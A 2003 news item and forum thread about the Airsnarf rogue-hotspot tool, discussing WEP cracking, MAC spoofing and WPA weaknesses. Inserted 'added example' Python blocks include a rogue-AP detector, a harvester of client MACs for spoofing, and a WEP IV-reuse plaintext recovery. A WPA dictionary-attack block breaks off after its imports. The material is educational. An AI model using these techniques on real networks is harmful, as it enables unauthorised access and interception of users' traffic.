Out of Thin Air
Hacker tool allows Wi-Fi password grabs
by Karl Bode 10:47AM Wednesday Nov 26 2003
As Wi-Fi users anticipate better wireless security, a new tool lets an attacker knock you off the network and collect your login credentials before you've finished your latte. "Airsnarf" is the latest utility to trouble wireless enthusiasts, and it is the focus of attention this morning at both Computer User and DailyWireless.org. The tool, developed by a group that calls itself "the Shmoo Group", lets an individual knock an unsuspecting user off a hotspot. It then broadcasts a stronger signal under the hotspot's own network name, mimics the hotspot's logon page, and tricks the user into handing over their username and password when they believe they are logging back on to the legitimate network. Nothing in this involves breaking encryption: the attack impersonates the hotspot and its login page, which is why it works against the open, unencrypted networks that public hotspots typically run.

The group naturally insists it didn't develop the tool with any deviant use in mind, but instead hopes to "demonstrate an inherent vulnerability of public 802.11b hot spots," according to the group's website (as if the tech community thought 802.11b was truly secure to begin with). The Daily Wireless report offers some potential countermeasures for users or WISPs hoping to avoid the tactic.


IamZed
Premium
join:2001-01-10
Dayton, OH

Possible, but not probable

The creation of false sign-in pages seems a bit obtuse. It's not something you do as a drive-by. I would hope people become familiar enough with this that when everyone is booted, they let a sacrificial lamb try to log back on first.
--
A thing worth doing is worth doing to excess.

oliphant5
Got Identity?
Premium
join:2003-05-24
Corona, CA

Re: Possible, but not probable

Exactly...this isn't anything new. This is just a twist on the spoofed email looking for AOLers' account info. Like most "hacks" this requires end-user carelessness in order to succeed.
--
Don't get it, demand it! The Anime Network »www.theanimenetwork.com/index.html And something pretty good from the Cooler »elev.ru.orebro.se/ru0369/HAHAHAHA.MPG

LBDSL
Lightning Bolt

join:2002-01-07
Auburn Hills, MI

someone will always crack it.

No matter what you build, someone will crack it. It is the way the world works.
--
Lightning Bolt Technologies

TexasGuy
49 States And Texas
Premium
join:2002-12-02
Houston, TX

Re: someone will always crack it.

said by LBDSL:
No matter what you build, someone will crack it. It is the way the world works

Right, go hack 256 bit DES key. Right. Easier to storm the safe and break it open.
--
Who drank has died, who drinks will die. Is he immortal who is sober?

skyfreedomdo
Premium
join:2003-01-01
Boise, ID

What do u mean 802.11b is not secure?!!!

I got WEP to protect me!!!!

ctceo
Premium
join:2001-04-26
South Bend, IN

Re: What do u mean 802.11b is not secure?!!!

Apparently you need to open your other eye.

skyfreedomdo
Premium
join:2003-01-01
Boise, ID

Re: What do u mean 802.11b is not secure?!!!

Apparently you need to c the humor!

ctceo
Premium
join:2001-04-26
South Bend, IN

Re: What do u mean 802.11b is not secure?!!!

Humor observed...

damonlab
Premium
join:2001-05-02
Detroit, MI

Re: What do u mean 802.11b is not secure?!!!

said by ctceo:
Humor observed...

lol

kba4

join:2001-10-23
Canton, OH

hot-spot providers take heed!!

we will not let you provide free/cheap access to just the 'special' individuals you know about! you have been warned!!

seriously, can anyone honestly have expected wi-fi to ever be secure? how can you make a broadcast 'secret' anyway? it's just an arms race between the 'hackers' and the providers/developers... i hope anyone investing in the hot-spot idea knows this going in, and will continue to fund what could someday become a utopia of free access anywhere in the country- even world. i don't care how much you encrypt the data, if it's broadcast, it can be seen by anyone, and the 'hacker' actually prefers not to be paid for his work, unlike the 9-5 sysadmin who 'secures the network'. oh well, someone with more sense, please add to the discussion, i just saw the story and felt like posting:)
--
the USA is a weapon of mass destruction.

lazarus_

join:2002-08-31
Resolute, NU

Re: hot-spot providers take heed!!

said by kba4:
we will not let you provide free/cheap access to just the 'special' individuals you know about! you have been warned!!

seriously, can anyone honestly have expected wi-fi to ever be secure? how can you make a broadcast 'secret' anyway? it's just an arms race between the 'hackers' and the providers/developers... i hope anyone investing in the hot-spot idea knows this going in, and will continue to fund what could someday become a utopia of free access anywhere in the country- even world. i don't care how much you encrypt the data, if it's broadcast, it can be seen by anyone, and the 'hacker' actually prefers not to be paid for his work, unlike the 9-5 sysadmin who 'secures the network'. oh well, someone with more sense, please add to the discussion, i just saw the story and felt like posting:)

Like my networking prof always says: "Anyone with a wet finger or metal clothing hanger can pickup your signal.."

Using WiFi you have the portability and ease of install but have to give up security.. If you have important info going over the network you should never use WiFi..

kapil
The Kapil

join:2000-04-26
Chicago, IL

Where...

...can I get me a copy of this thing?

Vamp
5c077
Premium
join:2003-01-28
MD
kudos:1

more hackers

Listing the name of the tool publicly only educates more people in hacking..

korym
Go Wisp's
ExMod 1999-03
join:1999-12-23
Richmond, VA

Re: more hackers

Oops.

Sisqo
World Champs. Babe Who?
Premium
join:2002-08-14
Methuen, MA
said by Vamp:
Listing the name of the tool publicly only educates more people in hacking..

This stinks, so how can someone really protect themselves? Now does this apply only to users that are using hotspots?
--
No it's not a payphone, it's a portable phone!
TheNerdShow

join:2003-11-16
Anchorage, AK

3 edits

Re: more hackers

This applies to home and business networks using popular wireless networking gear and using a form of encryption or password protection. The issue is moot since most people don't even bother to password protect their networks.
--
»thenerdshow.com »nerds.tk

gdead

@eisg.net

Defensive Techniques

Howdy,
So I've been involved in the Airsnarf project (I presented with Beetle at BlackHat Federal in DC a few months ago on the project). I've got a few things to say about this tool and the write-up about this.

First off, the type of attack that airsnarf carries out is not rocket science. It is not about breaking encryption but rather about tricking the client. The attack can be fully explained in about 5 minutes to a level that anyone with familiarity with 802.11 can fully understand it.

HOWEVER, not a single OS vendor, security tool provider, or driver vendor alerts the user that this kind of attack is being performed. This is completely a layer 2 attack that should be caught by any wireless security tool. At the point of our talk at BH, nothing existed that would tell the user "hey, bad things are afoot... you should stop using this network". Airsnarf is a wakeup call to the vendors.

To that end, we also wrote the hotspot defense kit (HSDK). It's designed to alert the user that there is a layer 2 attack underway. It can be downloaded from the airsnarf page. Currently it only runs on OS X, but we are working on a Windows port.

Finally, I am not a 3l337 blackhat hacker. I coauthored 802.11 Security through O'Reilly. I also try to educate as many people as I can about wireless security through talks, mailing lists, etc.

later
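Added example, tied to the article's description of the attack and to gdead's point above that it is a layer 2 attack any wireless tool could notice. This is not the article's text and not the Shmoo Group's Airsnarf or HSDK code. It watches a frame log for the two things a rogue-hotspot attack produces at layer 2: a burst of broadcast deauthentication frames claiming to come from the real AP, and the hotspot's SSID then appearing from a new BSSID that is far stronger than the known ones. Every frame record, address and signal value below is constructed for the demo; a real monitor would take frames from a card in monitor mode.

```python
"""Layer-2 rogue-hotspot watch over a constructed 802.11 frame log.

Added example; not from the article and not the Shmoo Group's Airsnarf or
Hotspot Defense Kit code.  Frame records are constructed for the demo.
"""
from collections import defaultdict, deque
from dataclasses import dataclass

BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass(frozen=True)
class Frame:
    t: float           # seconds since capture start
    kind: str          # "beacon" or "deauth"; other frame types are ignored
    bssid: str         # AP address as carried in the (never encrypted) MAC header
    ssid: str = ""     # SSID element of a beacon; empty for deauth
    rssi: int = -100   # received signal strength in dBm; higher is stronger
    dst: str = ""      # address 1 of a deauth frame


class HotspotWatch:
    """Alerts on a broadcast deauth flood, and on the SSID showing up from a
    new BSSID that is much stronger than the known APs or that appears right
    after such a flood.  A second AP at similar strength is left alone, since
    multi-AP hotspots are normal."""

    def __init__(self, deauth_limit=5, window=2.0, rssi_jump=20):
        self.deauth_limit = deauth_limit   # broadcast deauths per window before alerting
        self.window = window               # seconds
        self.rssi_jump = rssi_jump         # dB above the strongest known AP
        self.aps = defaultdict(dict)       # ssid -> {bssid: strongest rssi seen}
        self.deauths = defaultdict(deque)  # claimed sender -> recent deauth timestamps
        self.last_flood = None
        self.alerts = []                   # (kind, bssid, detail) tuples

    def observe(self, f: Frame) -> None:
        if f.kind == "deauth":
            self._deauth(f)
        elif f.kind == "beacon":
            self._beacon(f)

    def _deauth(self, f: Frame) -> None:
        q = self.deauths[f.bssid]
        q.append(f.t)
        while f.t - q[0] > self.window:    # drop timestamps outside the window
            q.popleft()
        if f.dst == BROADCAST and len(q) >= self.deauth_limit:
            self.alerts.append(("deauth-flood", f.bssid,
                                f"{len(q)} broadcast deauths claiming {f.bssid} within {self.window}s"))
            self.last_flood = f.t
            q.clear()

    def _beacon(self, f: Frame) -> None:
        known = self.aps[f.ssid]
        if known and f.bssid not in known:          # SSID seen before, but not from this BSSID
            strongest = max(known.values())
            after_flood = self.last_flood is not None and f.t - self.last_flood <= 5 * self.window
            if f.rssi - strongest >= self.rssi_jump or after_flood:
                why = f"SSID {f.ssid!r} now also from {f.bssid} at {f.rssi} dBm (known APs peak at {strongest} dBm)"
                if after_flood:
                    why += ", right after a deauth flood"
                self.alerts.append(("evil-twin", f.bssid, why))
        known[f.bssid] = max(f.rssi, known.get(f.bssid, -200))


def run(frames) -> list:
    w = HotspotWatch()
    for f in frames:
        w.observe(f)
    return w.alerts


# Constructed capture: two legitimate APs for the hotspot, then six spoofed
# broadcast deauths "from" the main AP, then a far stronger twin of the SSID.
REAL, REAL2, ROGUE = "00:0f:66:11:22:33", "00:0f:66:11:22:44", "00:02:2d:aa:bb:cc"
SAMPLE_FRAMES = [
    Frame(0.0, "beacon", REAL, "coffeeshop_wifi", -68),
    Frame(0.1, "beacon", REAL2, "coffeeshop_wifi", -74),   # second real AP: normal, no alert
    Frame(0.2, "beacon", REAL, "coffeeshop_wifi", -67),
    *[Frame(1.0 + 0.05 * i, "deauth", REAL, dst=BROADCAST) for i in range(6)],
    Frame(2.0, "beacon", ROGUE, "coffeeshop_wifi", -31),
]

if __name__ == "__main__":
    for kind, bssid, detail in run(SAMPLE_FRAMES):
        print(f"[{kind}] {detail}")
```

Both signals are read from management frame headers, which are never encrypted, so the check works on an open hotspot with nothing more than a card in monitor mode. The thresholds are deliberately simple; the point is that the attack is loud at layer 2 even though it is invisible at the login page.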

korym
Go Wisp's
ExMod 1999-03
join:1999-12-23
Richmond, VA

Re: Where...

»airsnarf.shmoo.com/

Also check out Airsnort too.

cinnamon
How Smart Is Your Card?
Premium
join:2002-01-19
Tulsa, OK

Of course from The Shmoo Group. You are running Red Hat Linux 9.0, aren't you?
Mr_Stealth
Premium
join:2001-05-18
Lucasville, OH
any Windows software like this?
my laptop's video card doesn't play well with Linux...I can't even use standard nVidia drivers with it, I have to use Toshiba's

I've used NetStumbler, but it just finds networks
--
Say goodbye to your privacy and security.
Say no to TCPA/TCG/NGSCB

aSic
application specific
Premium
join:2001-05-17
Wakulla, FL

Re: Where...

lol... the video card makes no difference at a command line..

...unless you're the wussy type that *NEEDS* X to do anything useful.
Mr_Stealth
Premium
join:2001-05-18
Lucasville, OH

Re: Where...

lol
I just need to take the time to get it running on command line and then find the drivers
I'm fairly certain there are some working ones available

but I just tried to take the easy way out with Red Hat and Mandrake...got through the install and it gave me a blank screen when it went to configure the video card

not like we really need to crack WEP keys...from what I have seen, most people don't have enough sense to use it anyway
--
Say goodbye to your privacy and security.
Say no to TCPA/TCG/NGSCB

skyfreedomdo
Premium
join:2003-01-01
Boise, ID

How long would it take to...

... break WEP 64 bit and 128 bit?
Any ideas or *shhh* experiences?
bmn
? ? ?
Premium,ExMod 2003-06
join:2001-03-15
hiatus

1 recommendation

Re: How long would it take to...

said by skyfreedomdo:
... break WEP 64 bit and 128 bit?

An hour or two on a REALLY busy network, several hours on a not-so-busy network and probably several days on one not used all that often. You have to capture a couple thousand to a million plus packets for some software.

As for this program, it didn't say whether or not you needed to get the WEP keys first or if the software does it for you by capturing and analyzing the packets. Of course that is assuming that your local WiFi-providing cafe actually has WEP turned on, and from casual war driving, many don't.
--
Male by birth... Geek by choice. -- Man... Earth's most foolish child.

skyfreedomdo
Premium
join:2003-01-01
Boise, ID

Re: How long would it take to...

Good point on WEP not being used by many. How about TKIP (Temporal Key Integrity Protocol), has anyone read up on or applied it?
--
SKYFREEDOM NETWORKS
Whatever the angle; We've got you covered.

DSLDUDE6
Got The Folding Farm Itch
Premium
join:2002-01-07
Norcross, GA
I like my MAC filtering. I've tried everything to get past that, and you just can't get in. WEP, MAC, and common sense will prevail over all...
--
»www.fnort.com

skyfreedomdo
Premium
join:2003-01-01
Boise, ID

Re: How long would it take to...

I like MAC filtering but there's always a chance of MAC SPOOFING!
But you are right common sense and, if I might add, knowledge of the enemy out there or within will prevail.
--
SKYFREEDOM NETWORKS
Whatever the angle; We've got you covered.
bmn
? ? ?
Premium,ExMod 2003-06
join:2001-03-15
hiatus
It's already been stated, but MAC spoofing will defeat MAC filtering. Most wireless cards have the ability to change the MAC address that is used by the card. I'd post a screenshot of how it can be done (it's very easy), but the laptop is packed up in the car.
--
Male by birth... Geek by choice. -- Man... Earth's most foolish child.

BeesTea
Internet Janitor
Premium,VIP
join:2003-03-08
00000

Re: How long would it take to...

Sure, changing your MAC is not hard. That isn't spoofing and it isn't "defeating" anything at all. You're literally becoming a device allowed to connect to the WAP. Now here's the interesting part. Can you explain the process of knowing what to set your MAC to in order to gain access to the WAP ?

On the issue of WEP, it isn't intended to provide strong cryptographic communication. WEP means "Wired Equivalent Privacy". That is, just as a wire holds the signal, keeping it from being intercepted easily, WEP keeps signal from being eavesdropped on easily.

This is another example of why the physical layer is NOT where security is applied for the average network. Wireless or otherwise.

Cheers,
-BeesT
--
2b2b2b415448300d
bmn
? ? ?
Premium,ExMod 2003-06
join:2001-03-15
hiatus

Re: How long would it take to...

said by BeesTea:
Can you explain the process of knowing what to set your MAC to in order to gain access to the WAP ?
It would involve sniffing traffic on that WLAN. You would then be able to detect the MAC address of a system associated with the WLAN that is your target. I haven't actually done it (over the black hat stuff), so the mechanics of doing it are not 100% in my skillset, but the conceptual process can be found elsewhere.

quote:
That is, just as a wire holds the signal, keeping it from being intercepted easily, WEP keeps signal from being eavesdropped on easily.
That was its intended purpose, but some rely on it solely for access and information protection. I always grin when people fire up something like telnet and login via a wireless connection. Of course without WEP, a network is just waiting to be had.
--
Male by birth... Geek by choice. -- Man... Earth's most foolish child.
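Added example for the exchange above about how an attacker learns which MAC to spoof. It is not code from this thread or from any sniffer named in it. It parses the 802.11 MAC header, which is sent in the clear whether or not the Protected (WEP) bit is set, and pulls the client addresses out of data frames for one BSSID. The header layout and the address-role table come from IEEE 802.11-1999 clause 7; the frames themselves (addresses, sequence numbers, and an opaque stand-in for a WEP body) are constructed for the demo.

```python
"""802.11 MAC header parsing: addresses stay in the clear even when the
frame body is WEP-protected.

Added example; not code from the thread.  Header layout per IEEE 802.11-1999
clause 7; the sample frames are constructed.
"""
import struct

TYPES = {0: "mgmt", 1: "ctrl", 2: "data"}


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def parse_mac_header(frame: bytes) -> dict:
    """Decode frame control, the three fixed addresses and sequence control."""
    if len(frame) < 24:
        raise ValueError("frame shorter than the 24-byte MAC header")
    fc = struct.unpack_from("<H", frame, 0)[0]            # little-endian 16 bits
    ftype, subtype, flags = (fc >> 2) & 0x3, (fc >> 4) & 0xF, fc >> 8
    to_ds, from_ds = bool(flags & 0x01), bool(flags & 0x02)
    protected = bool(flags & 0x40)                         # the "WEP" bit in the 1999 text
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    seq_ctl = struct.unpack_from("<H", frame, 22)[0]
    hdr = {"type": TYPES.get(ftype, "reserved"), "subtype": subtype,
           "to_ds": to_ds, "from_ds": from_ds, "protected": protected,
           "seq": seq_ctl >> 4, "frag": seq_ctl & 0xF,
           "addr1": mac_str(a1), "addr2": mac_str(a2), "addr3": mac_str(a3)}
    if hdr["type"] == "data":
        # Address roles depend on the To/From DS bits (802.11-1999 Table 4).
        if not to_ds and not from_ds:   # ad hoc: DA, SA, BSSID
            da, sa, bssid = a1, a2, a3
        elif from_ds and not to_ds:     # AP -> station: DA, BSSID, SA
            da, bssid, sa = a1, a2, a3
        elif to_ds and not from_ds:     # station -> AP: BSSID, SA, DA
            bssid, sa, da = a1, a2, a3
        else:                           # WDS/bridge: RA, TA, DA, then SA after seq ctl
            da, bssid = a3, None
            sa = frame[24:30] if len(frame) >= 30 else None
        hdr.update(da=mac_str(da), sa=mac_str(sa) if sa else None,
                   bssid=mac_str(bssid) if bssid else None)
    return hdr


def build_data_frame(sa, da, bssid, *, to_ds, from_ds, protected, seq, body):
    """Assemble a (non-WDS) data frame with the address order the parser expects."""
    flags = (0x01 if to_ds else 0) | (0x02 if from_ds else 0) | (0x40 if protected else 0)
    fc = (flags << 8) | (2 << 2)                            # type 2 = data, subtype 0
    if to_ds and not from_ds:
        a1, a2, a3 = bssid, sa, da
    elif from_ds and not to_ds:
        a1, a2, a3 = da, bssid, sa
    else:
        a1, a2, a3 = da, sa, bssid
    return (struct.pack("<HH", fc, 0) + mac_bytes(a1) + mac_bytes(a2) + mac_bytes(a3)
            + struct.pack("<H", seq << 4) + body)


def is_group_addr(mac: str) -> bool:
    return bool(int(mac[:2], 16) & 0x01)       # broadcast/multicast bit


def harvest_station_macs(frames, target_bssid: str) -> list:
    """Client MACs of target_bssid, read straight from the headers: the sender
    of station->AP frames and the receiver of AP->station frames."""
    stations = set()
    for frame in frames:
        h = parse_mac_header(frame)
        if h["type"] != "data" or h.get("bssid") != target_bssid:
            continue
        client = h["sa"] if h["to_ds"] else h["da"] if h["from_ds"] else None
        if client and not is_group_addr(client):
            stations.add(client)
    return sorted(stations)


# Constructed frames.  FAKE_WEP_BODY stands in for IV || key-id || RC4(data+ICV);
# its contents never matter because the harvest only reads the header.
AP, GATEWAY = "00:0f:66:11:22:33", "00:50:56:c0:00:08"
STA1, STA2 = "00:40:96:ab:cd:ef", "00:a0:f8:12:34:56"
FAKE_WEP_BODY = bytes.fromhex("a1b2c3") + b"\x00" + b"\x5a" * 40 + b"\x11\x22\x33\x44"
SAMPLE_FRAMES = [
    build_data_frame(STA1, GATEWAY, AP, to_ds=True, from_ds=False, protected=True, seq=17, body=FAKE_WEP_BODY),
    build_data_frame(GATEWAY, STA2, AP, to_ds=False, from_ds=True, protected=True, seq=900, body=FAKE_WEP_BODY),
    build_data_frame(AP, "ff:ff:ff:ff:ff:ff", AP, to_ds=False, from_ds=True, protected=True, seq=901, body=FAKE_WEP_BODY),
    build_data_frame(STA2, STA1, "02:aa:bb:cc:dd:ee", to_ds=False, from_ds=False, protected=False, seq=3, body=b"\x00" * 8),
]

if __name__ == "__main__":
    for f in SAMPLE_FRAMES:
        print(parse_mac_header(f))
    print("clients of", AP, "->", harvest_station_macs(SAMPLE_FRAMES, AP))
```

This is the whole reason MAC filtering buys so little: the filter's allow-list is broadcast in every data frame the AP exchanges with an allowed client, WEP or no WEP.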

NotAHacker

@dbma.com

Re: How long would it take to...

How hard is it to spoof a MAC address? Well, if you have the software and knowledge to determine WEP keys, you already have everything you need to also learn all the authorized MAC addresses on that WLAN.

I'm not going into further detail, even though the info is widely available on the Internet.

BeesTea
Internet Janitor
Premium,VIP
join:2003-03-08
00000

1 edit
said by bmn:

It would involve sniffing traffic on that WLAN. You would then be able to detect the MAC address of a system associated with the WLAN that is your target. I haven't actually done it (over the black hat stuff), so the mechanics of doing it are not 100% in my skillset, but the conceptual process can be found elsewhere.

That's an interesting concept. It was my understanding that by frequency variation the clients were not able to see one another, hence the need for a WAP. Does this require the NIC to be in adhoc mode ? I wish I had more than just my laptop running on 802.11 here to play with.

I've been looking for a bit this evening and can't find any method that doesn't require using crazy radio frequency tools. There are some funky white papers on parsing radio streams in the unlicensed frequency ranges but they seem to be more "find the person snooping your cordless phone" type stuff.

If you happen to find anything on this please let me know, as that's not at all how I understood it to operate.

Cheers,
-BeesT

OK, I've scoured the Seattle wireless mailing list archive and it seems my understanding of how this works is based on modern 802.11 card implementations. Newer cards apparently make it non-trivial to intercept packets on the way to the WAP or vice versa. Presumably older cards with new firmware would also reduce this risk.
--
2b2b2b415448300d

sporkme
drop the crantini and move it, sister
Premium,MVM
join:2000-07-01
Morristown, NJ
said by BeesTea:
Now here's the interesting part. Can you explain the process of knowing what to set your MAC to in order to gain access to the WAP ?
Just run your favorite sniffer for a while. The frame headers are NOT encrypted when WEP is enabled. So it's actually pretty easy. I've been toying with "KisMac" and it's pretty simple. It's totally point-n-drool. Right click on a node and there's a menu item "Find Key". With a moderate amount of traffic this happens in less than a half hour.

WEP is fundamentally broken. I don't mind the idea of encrypting at L2, but they chose a very weak algorithm.
--
just a minute
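Added example for the WEP discussion above (the packet counts bmn gives, and sporkme's remark that the encryption is fundamentally broken). It is not code from the thread or from AirSnort or KisMAC. RC4 itself is not the weak part; the problem is how WEP uses it: a 24-bit IV prepended to a static key, so the keystream repeats whenever an IV does. The code below is a toy WEP encryptor faithful to the 802.11-1999 framing (IV || key-id || RC4(IV || key, data || CRC-32 ICV)), plus the birthday bound on IV repeats and the plaintext recovery a repeated IV allows. Key, IVs and packets are constructed. This demonstrates IV reuse, not the weak-IV key recovery the cracking tools actually implement.

```python
"""WEP's 24-bit IV: collisions and keystream reuse, with a toy WEP encryptor.

Added example; not code from the thread or from AirSnort/KisMAC.  Key, IVs
and packet contents are constructed.  Framing per 802.11-1999:
body = IV(3) || key-id(1) || RC4(IV || key, data || CRC-32).
"""
import math
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):                               # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:                                     # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    assert len(iv) == 3 and len(key) in (5, 13)        # 40- or 104-bit key
    return iv + bytes([key_id << 6]) + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, body: bytes) -> bytes:
    iv, enc = body[:3], body[4:]
    pt_icv = rc4(iv + key, enc)
    pt, tag = pt_icv[:-4], pt_icv[-4:]
    if icv(pt) != tag:
        raise ValueError("ICV mismatch")
    return pt


def recover_via_iv_reuse(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """Same key + same IV => same keystream, so c1 ^ c2 = p1 ^ p2.
    Knowing p1 (e.g. a predictable ARP/LLC packet) yields p2 without the key."""
    if c1[:3] != c2[:3]:
        raise ValueError("different IVs: no keystream reuse to exploit")
    n = min(min(len(c1), len(c2)) - 4, len(known_p1))
    return bytes(a ^ b ^ p for a, b, p in zip(c1[4:4 + n], c2[4:4 + n], known_p1[:n]))


def iv_collision_probability(packets: int, iv_bits: int = 24) -> float:
    """Birthday bound for random IVs: P(at least one repeat among `packets`)."""
    return 1 - math.exp(-packets * (packets - 1) / (2 * 2 ** iv_bits))


def packets_for_half_chance(iv_bits: int = 24) -> int:
    """Packets until a repeated IV is about as likely as not (about 4823 for 24 bits)."""
    return math.ceil(math.sqrt(2 * math.log(2) * 2 ** iv_bits))


KEY = bytes.fromhex("0badc0ffee")                      # constructed 40-bit WEP key
IV = b"\x01\x02\x03"                                    # the IV both packets happen to use
# Constructed plaintexts: an LLC/SNAP + ARP header the attacker can predict,
# and a second packet whose contents are the target.
P1 = bytes.fromhex("aaaa030000000806") + bytes.fromhex("0001080006040001") + bytes(20)
P2 = bytes.fromhex("aaaa030000000800") + b"GET /login?user=bob&pass=hunter2 HTTP/1.0\r\n"


def demo() -> bytes:
    """Recover the first len(P1) bytes of P2 from two bodies sharing an IV."""
    c1 = wep_encrypt(KEY, IV, P1)
    c2 = wep_encrypt(KEY, IV, P2)
    return recover_via_iv_reuse(c1, c2, P1)


if __name__ == "__main__":
    print("recovered:", demo())
    print("P(repeat) after 500 pkts: %.4f, after 5000: %.3f" %
          (iv_collision_probability(500), iv_collision_probability(5000)))
```

The numbers line up with the capture sizes quoted in the thread: a few thousand packets already give even odds of a repeated IV, and many cards of the day reset the IV counter to zero on every power-up, so repeats arrived far sooner than the birthday bound suggests.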

aitech
Guru. Kneel

join:2000-12-19
Boston, MA

Re: How long would it take to...

Has anyone gotten a successful port of Kismet into windows yet, or is it still alpha?

And anyone have any idea when netstumbler .4 is coming yet?

DenverDialup

join:2003-06-06
Littleton, CO
Well, consider too that WPA is becoming the new standard in wireless security. I don't see why Shmoo has to go write another hacking/phreaking/wardriving tool to "prove an inherent insecurity in 802.11b"...anyone who's spent more than a day looking at wireless technologies today knows how insecure it is. Why not take that effort and translate it into something more useful -- like actually working to make WiFi more secure?
--
"Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning." -- Rich Cook
bmn
? ? ?
Premium,ExMod 2003-06
join:2001-03-15
hiatus

Re: How long would it take to...

said by DenverDialup:
Well, consider too that WPA is becoming the new standard in wireless security.
An article came out not long ago that stated that WPA is not much more secure than WEP and can still be broken.
--
Male by birth... Geek by choice. -- Man... Earth's most foolish child.
shmoe1

join:2003-09-06
Fremont, CA

Re: How long would it take to...

One article about WPA vulnerability I've encountered was by Robert Moskowitz, senior technical director at ICSA Labs.

It details problems with the pre-shared key of less than 20 characters with simple pass phrases that were vulnerable to a dictionary attack. Complex passphrases of longer than 20 characters seem to be less of a security issue.

Also, I also read that WPA is just as vulnerable as WEP to denial-of-service attacks.

If others can point to other articles or specific problems it would be useful.

Thanx

gruggni
Oxygen Gets You High

join:2003-07-28
Corpus Christi, TX

No need to panic

Tools like this have been around for a while. You only need to use the tool if someone has encryption turned on. The majority of residential wifi networks are already open. Really no need for worries. Very few wifi networks are actually encrypted.

Tools like this are used to break encryption. Anyone with malicious intent will just go to the open wifi network instead of an encrypted one. Breaking encryption takes time.
How else do you test encryption works? You make a tool to break it. If someone is trying to sell me wifi equipment and they say its secure, I want a way to test the encryption instead of taking someones word for it.
--
When I read about the evils of drinking, I gave up reading. --Henny Youngman

Rhobite
Premium
join:2002-02-24
Waltham, MA

Re: No need to panic

This tool has NOTHING to do with breaking encryption. It's a password-gathering tool, it puts up a fake login page just like you'd get from a T-Mobile or Verizon hotspot. Hotspots don't use WEP or WPA anyway, they are unencrypted. This tool just makes it easy to set up a rogue AP and fish for people's logins. The reason you can't just passively sniff for passwords is that I assume the real login pages are sent over SSL. Although I've never used a pay hotspot so I could be wrong.

reub2000
Premium
join:2001-12-28
Evanston, IL

I'll continue to use 10/100 Ethernet.

This type of attack would be impossible on ethernet. And I get 100Mbps instead of about 50MBps.


Mike
Premium,Mod
join:2000-09-17
Pittsburgh, PA
kudos:1

Playing with stuff Bill doesn't want you to have

All the cracking / hacking stuff is for unix based OSes.

There is no way in hell anyone would want to release something for windows. Thus, instead of precompiled hoopla.. you have to compile it a certain way. Thus, only someone who has the skill and knows their way around gcc can use it. That can be seen as a good thing and a bad thing... good: not everyone can use it.. bad: if they can use it, they can also own you in about 20 seconds.
--
Everyone is entitled to their opinion. Of course, they're entitled to be blithering idiots at the same time.
What this country needs is a good five dollar plasma weapon.
PhragX

join:2001-11-01

Re: Playing with stuff Bill doesn't want you to have

incorrect - there is a windows port of airsnort (for defeating WEP)

»airsnort.shmoo.com/windows.html

many tools such as ethereal/tcpdump are ported to windows, and there is of course netstumbler.

www.packetstormsecurity.nl has also posted (exploit) code that is easily compiled (or precompiled) for windows systems.

dilettante

join:2002-01-01
Haslett, MI

Want security? Just stay under their "radar"

I continue to use HomeRF here at home. As far as I know an 802.11 radio can't even see it. It's slow but cheap. Now to get hold of some HomeRF 2 gear!

Just doesn't always pay to be one of the cool kids I guess.

My thanks to Ashcroft or whoever chose to suppress the technology. ...tongue in cheek guys, really!

mimick

@lax1-4.xx.17.xx.lax1

broadband

Does anyone know how to open up your broadband more to get more speed?

v3xproof

@afspc.af.mil

WEP vs WPA

On a not-so-busy network it could take as little as 15 minutes to crack. The reason is a little tool called AirReply. A knowledgeable person can grab a good packet from the little traffic there is and just resend it over and over. The AP then sends information back over and over (generating tons of the initialization vectors needed to crack the WEP key). After about 15 minutes and 300,000 replayed packets, it will only take about 30 seconds to crack the actual key.

WPA is way more susceptible to DoS attacks IMHO. Why? Because WPA does not like replay attacks. If it detects one, it will disconnect that user... get the picture. At Defcon the Shmoo Group created a "WiFi Handgrenade". lol. They took a PDA and just had it replay all traffic... You take it from there.

About actually cracking WPA: I do believe there is only one weakness with it known as of today (at least with AES, but don't quote me on this)... users picking weak passkeys, which allow it to be cracked with a dictionary file. Choosing a passkey of 60 characters with absolutely no words, numbers, upper/lower case, and special characters will make it take longer to crack. Changing your passkey often should prevent this attack.

MAC filtering is bullshit. If you want the most secure wireless you can get, my suggestion: use WPA or WPA2 with AES. Make the user then have to VPN to get on the network (now they have to get credentials). When browsing, try to use SSL as much as possible. When chatting, try using an encrypted chat program. Etc...

Now about Shmoo: they aren't doing what they do to make people's lives miserable; they do it to educate dumb people, people that buy into any corporation's bullshit about how secure their wireless products are.

And about secure wireless networks... there is one. It's called SecNet 11. It is what the government uses. I don't know much about it other than what I found on the internet. I know that a single wireless card runs in the thousands.
If you want to know why I say it's secure (for now): it's approved to transmit up to Secret. I doubt the government would allow that to be transmitted over insecure means (at least I hope not). Hope I helped to clear up some misconceptions.
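Added example for the WPA-PSK dictionary weakness raised by shmoe1 (the Moskowitz paper on short passphrases) and again by v3xproof above. It is not code from this thread or from any tool it names. It carries the real attack through end to end: derive the PMK from a candidate passphrase and the SSID with PBKDF2, expand it to the PTK with the 802.11i PRF, and check the candidate against the MIC on EAPOL message 2 of a captured 4-way handshake. The derivation steps follow IEEE 802.11i; the AP and station addresses, nonces, message 2 bytes and word list are all constructed for the demo. The one real value is the 802.11i Annex H test vector (passphrase "password", SSID "IEEE").

```python
"""WPA-PSK passphrase recovery by dictionary, against a constructed 4-way handshake.

Added example; not from the thread or any tool named in it.  Key derivation
per IEEE 802.11i; addresses, nonces, EAPOL bytes and word list are constructed.
"""
import hashlib
import hmac

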